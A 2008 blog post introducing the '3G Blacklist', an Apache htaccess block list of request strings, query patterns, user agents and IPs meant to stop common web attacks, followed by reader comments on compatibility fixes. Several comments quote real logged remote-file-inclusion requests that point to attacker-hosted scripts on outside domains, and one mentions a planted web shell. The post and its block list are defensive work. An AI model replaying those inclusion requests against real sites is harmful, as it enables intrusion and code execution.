Perishable Press 3G Blacklist

by Jeff Starr on Tuesday, May 13, 2008 85 Responses

[ 3G Stormtroopers ]

After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses. Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks. Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates, however many bad hits were still getting through. More work was needed..

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing a vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS 
<ifmodule mod_rewrite.c>
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</ifmodule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from 75.126.85.215  "# blacklist candidate 2008-01-02 = admin-ajax.php attack "
 deny from 128.111.48.138 "# blacklist candidate 2008-02-10 = cryptic character strings "
 deny from 87.248.163.54  "# blacklist candidate 2008-03-09 = block administrative attacks "
 deny from 84.122.143.99  "# blacklist candidate 2008-04-27 = block clam store loser "
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)

Wrap Up..

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual agents and IP is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

  • 2008/05/14 — removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.
  • 2008/05/18 — removed the following three directives to facilitate Joomla functionality (hat tip: Don):
    RedirectMatch 403 \/modules\/
    RedirectMatch 403 \/components\/
    RedirectMatch 403 \/administrator\/
  • 2008/05/31 — removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin (hat tip: Sat).

85 Responses

Add a comment

[ Gravatar Icon ]

Louis#1

This is solid gold :)

I’ve had no issue so far with the whole list past into my root .htaccess. I’ll see if it affects the administration of my blog in the futur.

Really great stuff as usual from you. The list is clean and comprehensive.

The formatting syntax with the little spaces before Redirect directives is a little strange; is it your new favorite syntax ? :d

[ Gravatar Icon ]

Perishable#2

Excellent, thanks for trying it out :) I did as much testing as possible (primarily via WordPress), however it is important to hear how the method works (or doesn’t) in other environments. One thing I failed to emphasize in the article series involves global noninterference. There are many possible strings to blacklist — many of which would be far more effective and efficient — but doing so would result in conflicts and errors on various platforms. Anyway, I am getting carried away here, but I am stoked that you are using 3G! (and yes, the indentation of nested directives is important — even in htaccess files ;)

[ Gravatar Icon ]

Louis#3

I might be biased by the excellent post I recently read on Daringfireball — on “Why Apple won’t buy Adobe“, but it might be true in our case that making the rules generic enough so it won’t break any forum/CMS/whatever plateform, also makes the rules less relevant and powerful.

I think that it may be better to keep focused on one environnement only (i.e. Wordpress), and do a heck of a job there. We could also have different variants of the list, for different plateforms.

Anyway, that is just my opinion, as a Wordpress lover and PerishablePress reader.

About my question on indentation, it was more the fact that you are using one space to indent, instead of the classic tabulation. I wondered what did motivate this choice.

[ Gravatar Icon ]

Alissa Miller#4

This 3G series is great. I’ve been following all the articles and updating my .htaccess in small chunks.

Everything is working magically. I’m glad that you got the update in for the Mint fix. I was going to say something, but you beat me to it.

[ Gravatar Icon ]

Don#5

As always great work man! I had a quick test run with it on WP; no holes!

On joomla (1.013) though a few issues that can be resolved my removing these lines:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

I haven’t fully tested in Joomla though; will do when time permits. I also noticed you reduced the list of user agents. may i ask the benefits of the downsize?

[ Gravatar Icon ]

Perishable#6

@Louis: good point — the 3G Blacklist may very well evolve along such a trajectory in the future. For now, however, the strategy has proven general enough to protect across platforms without unintentional functional interference. Subsequent editing of 3G directives is critical for the fine-tuning of targeting specificity. This pruning process is greatly facilitated by 3G users such as Don, who continues to help test the list on the Joomla platform. OT: I think tabbed spacing in htaccess code is just too much, almost to the point of looking ridiculous ;)

[ Gravatar Icon ]

Perishable#7

@Alissa: Thanks for the positive feedback. I am glad that you are taking advantage of the information :) I should mention that the complete version of the 3G Blacklist (as presented in this article) contains slightly different content than presented in the series. You may want to compare the individual series chunks with the complete version, as only it will be kept current with updates and other findings. Also, good call on Mint — if anything else turns up, please let us know!

[ Gravatar Icon ]

Perishable#8

@Don: Thank you — list updated and credit given for the Joomla-conflicting directives. As always, thanks for your help with the Joomla testing. I look forward to hearing of any other potential issues. Actually, I have been considering removing the other three directory path patterns as well. If memory serves, their use in exploitative attacks is rarely seen outside of query strings containing full URL path information. Thus, explicitly blocking the path segments is essentially unnecessary, potentially doing more harm than good, especially given their prevalence in modern file architecture. So, I’ll hedge for now, but wouldn’t be surprised to see them disappear before the end of the month..

As for the downsizing of the user-agent blacklist, there are several benefits, including increased performance, scalability, flexibility, and relevance. Of course, 3G users are welcome to drop in a full copy of the Ultimate htaccess Blacklist or any other mega-list for that matter. For the 3G, I wanted to wipe the slate clean, give it a fresh start and add new agents on an “as-needed” basis. I could go on about it, but rather I will point you to this article for the full story.

[ Gravatar Icon ]

Sat#9

Well, all of this is now implemented on a WordPress site for our company. Having tested all the features of the site, everything is still working just as great - but now with added security. Thanks Jeff!

On the admin side of things however, it appears that “RedirectMatch 403 config\.php” breaks the “visual” mode when creating/editing posts in WordPress for me. This is no big deal really, but I just wanted to confirm, if this is the case for you too, or if I missed something.

Cheers,

Sat.

[ Gravatar Icon ]

Perishable#10

Thanks for the feedback, Sat. Checking into this, I did notice that the visual-editing mode seemed not to work in WordPress 2.3. I have yet to test on WordPress 2.5, but even if visual editing works in that version, breaking any WordPress-related functionality is a bad idea (especially in 2.3!). Thus, I have removed the offending rule and updated the article accordingly. Thank you for your help in improving the quality of the 3G Blacklist!
Cheers,
Jeff

[ Gravatar Icon ]

Louis#11

Hi Jeff,

I couldn’t wipe out of my head what John Gruber once said about Wordpress and caching. It’s such a shame caching isn’t a part of Wordpress core.

Therefore, after giving it some time to grow, I decided to give WP-SuperCache a chance. After some tweaking, it seems to be working on my blog.

In the process, I discovered that the following line of your wonderful 3G Blacklist was causing the plugin not to serve the .html or .html.gz files.

RedirectMatch 403 \/\/

I commented it out and the rest of the blacklist seems to be okay.

I hope it helps :)

[ Gravatar Icon ]

Perishable#12

Louis! Good to see you again (I was beginning to wonder if everything was okay..;)

Anyway, check out Alissa Miller’s excellent article covering the Super-Cache/3G-Blacklist conflict. Apparently, Super Cache rewrites permalinks with an extra trailing slash, thus triggering the double-forward slash block from the blacklist. Alissa documents the issue extremely well and provides an easy fix that ensures continued success with the double-forward slash filter.

Regards,
Jeff

[ Gravatar Icon ]

Louis#13

Hehe, I make a really bad reader… I even can’t cheerlead :p

By the way, thank you for the link, I was an interesting read. I edited my .htaccess and it’s working fine for me too.

As I had my nose on Apache code, I changed the way I handle gzip content on my server. I used to have a somehow tricky strategy involving 3 .htaccess files et co; now I centralize everything in the root .htaccess — as it should be — and I find the code to be way better.

Here it is:

# SEND GZIPPED CONTENT TO COMPATIBLE BROWSERS
AddEncoding x-gzip .gz
AddType "text/css;charset=utf-8" .css
AddType "text/javascript;charset=utf-8" .js
RewriteCond %{HTTP:Accept-encoding} gzip
#RewriteCond %{HTTP_USER_AGENT} !Safari
RewriteCond %{REQUEST_FILENAME}.gz -f
RewriteRule ^(.*)$ $1.gz [QSA,L]

[ Gravatar Icon ]

Perishable#14

Glad to hear that the Blacklist is once again working fine for you. That particular rule blocks many ill requests. It is good to have it!

Interesting that you mention centralizing htaccess rules. I have been working on the very same thing. I am in the process of consolidating everything in the public web root, such that individual domains will require much less fiddling. Definitely way better ;)

Thanks also for the sweet htaccess code — looks juicy! I have seen similar directives floating around the Web, but have yet to experiment with them. As you may know, my host (ASO) recently disabled gzip compression on all servers. I am still able to deliver compressed (X)HTML content, but CSS and JavaScript are currently sent uncompressed.

[ Gravatar Icon ]

Louis#15

(a) Yes, it’s my favorite rule indeed, if you remember :p

(b) Managing Apache behavior should always be done in one configuration file (aka .htacces) only. As you say, it’s way easier.

(c) It is juicy, believe me. I’m using it on my main website for the moment, and boy I wish I had known it before !

It filters the browsers and serve compatible ones the .gz version of static files, and that, all over your website. That means for example, that you can gzip Wordpress admin JS & CSS files, and appreciate a tremendous boost on admin pages loading delays !

With files like prototype.js or jquery.js being used by Wordpress, and weighting around 100kb, being served a 70% lighter .gz alternative is really cool.

[ Gravatar Icon ]

Perishable#16

Definitely sweet, but does that mean you are responsible for manually creating and maintaining the individual zip files?

[ Gravatar Icon ]

Louis#17

That’s the whole idea. It only applies to file you know won’t change. You compress them manually once, then serve these .gz files to the visitors.

On-the-fly compression has its great advantages, but for static content, it’s a waste of CPU.

I wrote a full post on this on my blog, but I fear Google’s translation won’t be as appealing as my natural writing style.

Once again, langage is a true barrier :/

[ Gravatar Icon ]

Tom#18

Is the 3G Blacklist supposed to replace the 2G Blacklist or can you put them both together?

[ Gravatar Icon ]

Perishable#19

Hi Tom, the 3G Blacklist is meant to replace the 2G in its entirety. Running both together would be overkill..

[ Gravatar Icon ]

James#20

Very nice work!! I put this script in place and have notice a significant reduction in the log files.
How would you modify this script to deny all user agents (while keeping in place an allow all IP with deny on specific IPs)? In other words, I would like to allow IP (with specific IP denials) and disallow all user agents? I’ve got a pesky problem with user agents (legit names) trying to access an exploit which no longer exists on our site. see below..

f2.d.5446.static.theplanet.com - - [06/Aug/2008:01:00:51 +0000] "GET
/portal/components/com_extcalendar/extcalendar.php?
mosConfig_absolute_path=http://www.shakershoppe.com/_files/x.txt??M
HTTP/1.1" 403 259

3G is doing a nice job of issuing 403s but I’m ready to turn off all user agents.

Keep up the GREAT WORK!!!

[ Gravatar Icon ]

Jeff Starr#21

Hi James, glad to hear the blacklist is working for you :) As far as disallowing all user agents while allowing specific IPs, either I am not understanding you correctly or I am confused as to how that might work. It seems that blocking all user agents would essentially block all traffic/visitors, correct? Otherwise, the rules used to block all user agents would conflict with any list of allowed IP addresses. What am I missing here?
Regards,
Jeff

[ Gravatar Icon ]

James#22

Jeff thanks very much for the quick reply and sorry about the confusion. After spending some time on the apache site, i came to the conclusion that blocking user agents (via deny) would also impact the default of deny for IPs. In otherwords apache seems to only allow one default for the typically allow, then deny

In essence blocking all user agents would essentially block all traffic/visitors. I would like to essentially deny all bots/crawlers but allow users. Is there away to do this (instead of specifying user agents to keep out - like in your PART III: USER AGENTS)?

Thanks,
James

[ Gravatar Icon ]

Jeff Starr#23

Hi James, in my experience, blocking specific user agents is a moderately futile endeavor. The reason for this is that user agents are constantly changing and easily faked. Keeping an effective blacklist of user agents requires a fair amount of diligence, researching new agents, new fakes, and then checking and updating the blacklist and so on. This is precisely one of the reasons why I developed the 3G blacklist. The 3G takes a different approach by blocking the various character strings used in attacks, thereby eliminating the need for regular maintenance and, ultimately, monstrous lists of banned agents. Nonetheless, I have compiled an excellent blacklist of undesirable user agents, bad bots, scrapers, and other scumbags. It is extensive in its scope, yet not so exhaustive as to negatively affect server performance. The compressed version of the list is available here.
Regards,
Jeff

[ Gravatar Icon ]

Martin#24

Hey Jeff,

I fired the 3G blacklist into the .htaccess file in my server’s root and things have gone haywire!

I’ve replaced it with the original file my I’m still getting sitewide Internal Server Errors.

If you have any ideas on what I might’ve done, I’d truly appreciate hearing them,

Cheers,

[ Gravatar Icon ]

Jeff Starr#25

Get in touch with your web host asap and explain the issue.. it sounds like something in the htaccess file (or the htaccess file itself) tripped a permanent server error. Generally when errors like this happens it requires a reset of the server software to restore functionality.

As for the cause of the problem, I would make sure that your server is running Apache and that your host enables local htaccess directives. After that, you need to ensure that the required Apache modules are available to local htaccess files. If you are unsure about any of this, contact your host and they should be able to help you.

[ Gravatar Icon ]

Martin#26

Thanks so much for the help mate, I solved the problem by manually deleting .htaccess in two directories (I have wp installed on a subdirectory with index.php in the root) and recreating them with the original data, so sorry for bothering you.

I’m still unsure why the 3G list would cause such havoc, but since the server is running Apache and that my host enables local htaccess directives, I’m going to research into number 3: that “required Apache modules are available to local htaccess files”. I hope to get it sorted soon as I can, I will let you know how it goes.
Thanks again.

[ Gravatar Icon ]

TechJammer#27

Jeff: You have Jakarta Commons blacklisted above, and I have User-Agent entries in my logfile for “Jakarta_Commons-HttpClient/3.1″ and also “Jakarta_Commons-HttpClient/3.1-rc1″.

Can you tell me why they are blacklisted? I tried to search info on the web and didn’t find anything useful.

[ Gravatar Icon ]

Jeff Starr#28

It’s been awhile, but if I recall correctly, the Jakarta Commons user agent was associated with some relentless email harvesting and subsequent spam activity. I think I finally just got tired of seeing their UA associated with so many mindless resource requests.. Since blacklisting it, Jakarta immediately became a non-issue, so I dumped it from memory. Nonetheless, I encourage you to experiment for yourself. Try removing their UA from the blacklist and watch for any suspicious activity..

[ Gravatar Icon ]

TechJammer#29

Thanks for the info Jeff, and also for maintaining such a useful web site! I have used quite a few of your tips and suggestions, and your site has become my primary reference for .htaccess and site security issues!

[ Gravatar Icon ]

Denny Smith#30

Thanks for all of your hard work on this site. I too refer to your site anytime I’m in need of .htaccess info / Wordpress loop hacks. Your loops have been instrumental in many of my projects.

Very impressive work!

Thank You!

[ Gravatar Icon ]

Jeff Starr#31

Hi Denny, thanks for the kind words! It is certainly an honor to be able to help others with WordPress, htaccess, and other web-design/development projects.

Btw, I really like your site! May I ask how you implemented the live (I assume) video/cam stream in the header area? Very cool.. ;)

[ Gravatar Icon ]

Nicole McCreary#32

I’ve had to change all the redirectmatches to rewrite rules in order for it to work on my host.

eg.)

RewriteCond %{REQUEST_URI} ^\: [OR]
RewriteCond %{REQUEST_URI} ^\; [OR]
RewriteCond %{REQUEST_URI} ^\< [OR]
....
RewriteCond %{REQUEST_URI} ^ref\.outcontrol
RewriteRule .* - [F,L]

I don’t touch rewrite rules very often, I was wondering if I have this correct.

[ Gravatar Icon ]

Jeff Starr#33

@Nicole: Interesting that your host allows rewriting but not redirectmatch.. may I ask which host you are using?

As for the code, it looks correct, but you could easily test it by appending any of the matched character strings to various URLs at your site. Try a few different ones, and if the URLs return a 403 Forbidden response, everything should be fine.

[ Gravatar Icon ]

Nicole McCreary#34

Thanks Jeff, everything works correctly after testing it.

I think the mod_alias problem is an issue with the method my host uses for setting up virtual hosting and not permitting symbolic links to be served, or to even override that option.

[ Gravatar Icon ]

Jeff Starr#35

Great, Nicole — glad to hear everything is working correctly. Cheers :)

[ Gravatar Icon ]

Denny#36

Hey Jeff,

I am using Windows Media Encoder, a Pentium 4 pc as a server with a simple web cam setup in my office. Windows Media Encoder is free. The web cam was 50 bucks and the code is a simple (but not very W3c) emebed Windows Media Player.

Perhaps to date, I am the only person that feeds live video on myspace with the same setup.

Imagine what some people could do if they got their hands on that info! LOL!

[ Gravatar Icon ]

Jeff Starr#37

Hi Denny, thanks for the information.. I have been wanting to setup something similar on one of my other sites for quite awhile now. I assume that the video is a live stream and not some pre-recorded footage..? The software looks easy enough, and the embedding seems straightforward, but I imagine that setting up a secure personal server would require some time..

In any case, I think that personal live streaming video will become all the rage, just as soon as the technology makes it easy for “everyone” to do!

[ Gravatar Icon ]

Denny Smith#38

Jeff,

That’s correct. It is live video. I am using several things. One is no-ip to mask my actual ip address as well as a static ip port forwarded through 2 routers in a local network. (That was a pain sort of) but a DNS redirect is propbably the best advise as far as securing the connection. After all, you essentially open a pot on your computer. I had to hack my regisrty a bit to allow more than 2 connections to come in. I am thinking about writing a tutorial on the process that would better explain how I am doing this.

By the way, I emailed you a copy of my wp-admin but it must have tagged it as spam.

wp-admin.php was renamed to fx_wp-admin.php and contained code like this?

' //eval($code);
   } else {
      testdata('save_fail');
   };
'
Any suggestion on removing this type of hack?

Thanks!

[ Gravatar Icon ]

Claudio#39

Thank you, very interesting article. But I’m sorry because I’m on a window server and I use IIS.. by chance, have you ever translated your method for IIS? :-)

[ Gravatar Icon ]

Nicole McCreary#40

Regarding IIS - there is no easy or free way of doing the same thing.

You would either have to build something in ASP/.NET which would look at your request parameters and do all the required tests - or purchase a product like http://www.isapirewrite.com/ and then build all the filters you need yourself.

[ Gravatar Icon ]

Jeff Starr#41

@Denny: Hmm, I haven’t seen that type of hack before, however I would be more than happy to look at your file if you resend it (zipped!) or post it somewhere on the net..

As for a tutorial on your video streaming technique, I would love to see it, as would many others, I assume. Although one thing I have noticed when visiting your site is that the stream is not always active. On several occasions, the video tries to load but then ends up with just a blank screen..

[ Gravatar Icon ]

Claudio#42

@Jeff : thank you for you kind reply. My provider supports isapirewrite, but maybe I should study a bit to translate your list in my httpd.ini… :-)
have a good blogging!

[ Gravatar Icon ]

Peter#43

Re: # PART IV: IP ADDRESSES

I have found another very effective way to deal with blocking ip’s from scumbags remarkably in the Apache docs.

First you create a hosts.deny file and add the restricted IPs

190.176.128.6 -
190.176.176.15 -
190.176.150.150 -
190.176.138.63 -

Next you add a rule to your vhost config file or server main config.

RewriteEngine on
RewriteMap hosts-deny txt:/path/to/hosts.deny
RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
RewriteRule ^/.* - [F]

The nice thing about this is you can add IPs and the rule is enforced immediately.

[ Gravatar Icon ]

Jeff Starr#44

@Peter: Thanks for the tip! That looks like a potentially useful method of blocking IPs, however keep in mind that not everyone has access to the server configuration file(s). Also note that rules added directly to individual htaccess files are also “enforced immediately.” Great tip though — thanks for sharing! :)

[ Gravatar Icon ]

Peter#45

The same code could be used from a .htaccess file. The problem using .htaccess files is the server has to work looking for more controls up the path unless you use AllowOverride None at the bottom of your file. This will however render any other .htaccess files useless in higher directories.

[ Gravatar Icon ]

Denny#46

By the way Jeff. I found the culprit. Someone uploaded a C99madShell v. 2.0 madnet edition to my server. How could they get that on my server?

[ Gravatar Icon ]

Jeff Starr#47

@Peter: Thanks for the follow-up! Although deny (and other blacklisting) directives are typically implemented in the root htaccess file, so generally there is no need for the server to do any extra work, as far as I know..

@Denny: That’s crazy! Sounds like a serious security breach, if you ask me. If your site is otherwise secure, I wouldn’t rule out malicious activity from the admin/tech staff of your current hosting provider (unless you are self-hosted of course)..

[ Gravatar Icon ]

Michel#48

Hi,

Thanks for the Tips.

The RedirectMatch 403 \/\/ do not work on this attack:
http://www.mydomainname.com/request/playing.php/playing.php/common/db.php?commonpath=http://mun-hwa.com/bbs/kombi.txt?

But RedirectMatch 403 db\.php works and the most importend is to block outgoing traffic on server on port 80 the server can not get this url:
http://mun-hwa.com/bbs/kombi.txt?” :-)
I think the firewall works for the most include php attacks.

Also i use ossec to find attacks!

Thanks for helping! And i hope i found in the future more tips here!
Great job!

Michel

[ Gravatar Icon ]

AXZM#49

I can’t say enough good things about your work. I have had countless websites hacked over the years, some my fault, some the hosting provider, some the middleware I was using but in all cases if I had taken the right precautions in my .htaccess, I would have saved myself a lot of time and trouble. Thanks again…

[ Gravatar Icon ]

Jeff Starr#50

@Michel: My pleasure.. thanks for the heads up on the db.php vector; l will be implementing it into the next (4G) version of the blacklist. As you mention, the kombi.txt URL is blocked via query-string character match against http:, so no worries there. Ossec is another good call, of course. Thanks for the tips!

@AXZM: Thanks for the feedback! It is always good to hear positive reports about the blacklist. Also, as previously mentioned, I am working on the next version of the blacklist, which will protect against a broader range of attacks using optimized directives and improved overall performance. Stay tuned..

[ Gravatar Icon ]

Tony#51

I just added the 3G Blacklist to my .htaccess, thanks for the wonderful tips you’re sharing. I’ve been implementing your various tips the last few days, and the coldform too, that I’m starting to feel a little guilty, hehe.

I guess the “RedirectMatch 403 \/\/” isn’t conflicting with WP Super Cache anymore. Everything is working great on my blog.

Thanks!

PS: I wanted to be sure there are no problems with the list before submitting the comment, and found out that validator.w3.org can’t access my page, and neither can whatsmyip.org/mod_gzip_test/ (was using it to check if Super Cache is working). I guess these services just append our URL to the end of theirs, and the result is a double forward slash // , which conflicts, again, with this line:

RedirectMatch 403 \/\/

I guess you knew about this… Anyway we can comment it out when we use these services.
I don’t know what the line means, but I guess it’s not that important since you’re not using it. The validator could access perishablepress.com, and found one error. I’ll report you to the code police now!

I’m joking, don’t worry. I won’t tell them.

[ Gravatar Icon ]

Jeff Starr#52

@Tony: Glad to hear you are getting the most out of my site!That’s what it’s here for, so I am certainly glad you find the content useful.

That is good news that WP Super Cache is no longer conflicting with the directives in the blacklist. I had heard that they recently updated the plugin, and so it looks as if they must have fixed the issue referred to here. Great news :)

As for the various validators, they should still be able to access your pages. The RedirectMatch 403 \/\/ directive is actually targeting the main part of the URL itself and does not block anything in the query string. Additionally, the blacklist is only blocking requests for URLs that are a part of your domain; their appending your page URL to their URL would only be affected if they were using the blacklist on their own domain (which I’m sure they’re not). Nonetheless, I have seen this issue before with the directives used in the Ultimate htaccess Blacklist, so you may want to check that possibility as well.

[ Gravatar Icon ]

Fred#53

Hi, I followed a link to this article and have been reading up on the 3G Blacklist. I copied the file and paste it first in my configuration but the server won’t load so I tried it in the .htaccess and get Forbidden: Access Permission Denied.

I then start removing lines.
RedirectMatch 403 \
Only when I remove these two line the site loads but still will not work from my configuration file.

I’m new to all of this. Any suggesstions and is it OK to leave these out?

Thanks

Fred

[ Gravatar Icon ]

Jeff Starr#54

@Fred: By all means, remove any lines that cause your server to crash. Unfortunately, when it comes to blacklisting, it is practically impossible to forge a “one-size-fits-all” strategy. For the most part, the blacklist works great out of the box, but various server/site configurations may require some fine-tuning. To do so, simply comment out or remove the offending lines and you should be good to go. Each of the different RedirectMatch directives operates independently, so that removing any of them simply disables the particular character-string match for which they are intended to block. In other words, the blacklist will still protect against all types of attacks represented by the remaining directives.

[ Gravatar Icon ]

Fred#55

Jeff, thanks for the response and I’m pleased for the comments. I have couple of sites running off the same server and these bots really over load my server with the frequency at which they load pages. Because I have access to root, I’m able to httpd.reload and free resources up. For the next few days I will closely monitor to see the results.

Again, Many Thanks

Fred

[ Gravatar Icon ]

Tony#56

Sorry for the delay, it’s been a very busy week!

I found out that even though I could access my blog and everything is working fine, the validators couldn’t access it because of “RedirectMatch 403 \/\/” when WP Super Cache is enabled. If any one of them is disabled, then everything works fine.

Thanks again Jeff for this great list!

[ Gravatar Icon ]

Sebastian#57

Thanks for your work.

For Joomla 1.0.15 I needed to disable:
# RedirectMatch 403 \/\/
# RedirectMatch 403 \/includes\/

First rule is very site specific as tinyMCE inserted images with a double //
Second rule had prevented loading of some of the js scripts needed for administration. (eg. Save / Close links not working).

[ Gravatar Icon ]

Jeff Starr#58

@Sebastian: Thank you — this information will be integrated into the next version of the blacklist, which hopefully will be bubbling its way to the surface here very soon..

[ Gravatar Icon ]

Otto#59

Jeff, thanks for sharing the 3G list. One thing I noticed is that the character strings group blocked some of my pages. The 3G lines in question were:

# RedirectMatch 403 news\.php
# RedirectMatch 403 contact\.php

I am probably not the only one who named the pages on a more “traditional way”, such as contact.php. Any reason why these pages should be blocked?
Otto

[ Gravatar Icon ]

Jeff Starr#60

@Otto: Of course, comment out or remove any lines that prevent access to actual pages on your site. The two pages you mention are are very common and thus frequently targeted by attackers. If the pages actually exist, the number of misdirected site errors will decrease, however variations on the file names in question will persist.

[ Gravatar Icon ]

Mike#61

Thanks for the list. I am running a 1.5.8 Joomla! site (and am not technical - but have read up all I can about security. I installed in its entirety and it stops me accessing admin, but I just temp remove the # RedirectMatch 403 \/\/ using sftp then reset when I am finished.
1) Is it possible to exclude a certain directory &/or file but pick up others?
2) Why does the # RedirectMatch 403 \/includes\/ command appear to have no impact in FF3 but causes an error message to appear in IE7 which states “Overlib 4.10…..” This occurs when the events calendar is opened, and mouseovered. I think I have traced the code and the reason it should error is because of a call to an overlib JavaScript which is in a directory “public_html/includes/js/. The routine is by no means essential, but it bugs me not understanding why.
Does this mean that FF3 handles this in a different way or is it that maybe the command is in fact being ignored in FF3?

FYI I added another robot “Twiceler” (something to do with a Uni in USA) that was hammering my site to your blacklist. I do believe it is malicious but heavy on resources. It stopped it in its tracks.
I am looking forward to your next blacklist.
Thanks again.
Regards,
Mike

[ Gravatar Icon ]

Jeff Starr#62

@Mike: For the first question, check out Apache’s Files and FilesMatch directives. They may be used to target specific files and/or file types, and there are additional, similar directives for targeting specific types of requests as well.

For your second question, different browsers handle requests for JavaScript according to different algorithms. I wish I knew the specifics of their protocols for this, but unfortunately this information falls outside of my area of expertise. To retain the functionality of any files that are otherwise blocked by the blacklist, simply comment out the interfering directives in the blacklist. The remaining rules in the blacklist will continue to function perfectly well.

And.. thanks for the heads up on the Twiceler bot — I will definitely be adding it to the blocked user agent section of the upcoming 4G Blacklist.

Thanks for the great feedback!
Cheers,
Jeff

[ Gravatar Icon ]

Mike#63

Jeff,
Thx for the quick response, I will see what I can make of the suggested directives, at 1st glance they appear double Dutch.

Just to clarify about Twiceler, I meant to state I did NOT think it was malicious, but was hammering my site. I found a ref to it at the following http://www.tngforum.us/lofiversion/index.php?t2746.html

Regards,
Mike

[ Gravatar Icon ]

sleepy22#64

Hello,

I have a private site, I don’t want any bots clogging up my log files. I want to block all of the following get srings:

"GET /robots.txt
"GET / HTTP/
"GET /images
"GET /favicon.ico

Can anyone help me with the exact code I need for the htaccess file to deny the above commands?

I only want to allow real users who type an exact url address or enter by following a specific URL link to my site.

Thanks
Sleepy22

[ Gravatar Icon ]

Alex#65

Hi and thanks for all your hard work.

I’ve just popped the 3g Blacklist into my .htaccess file, and everything seems OK.

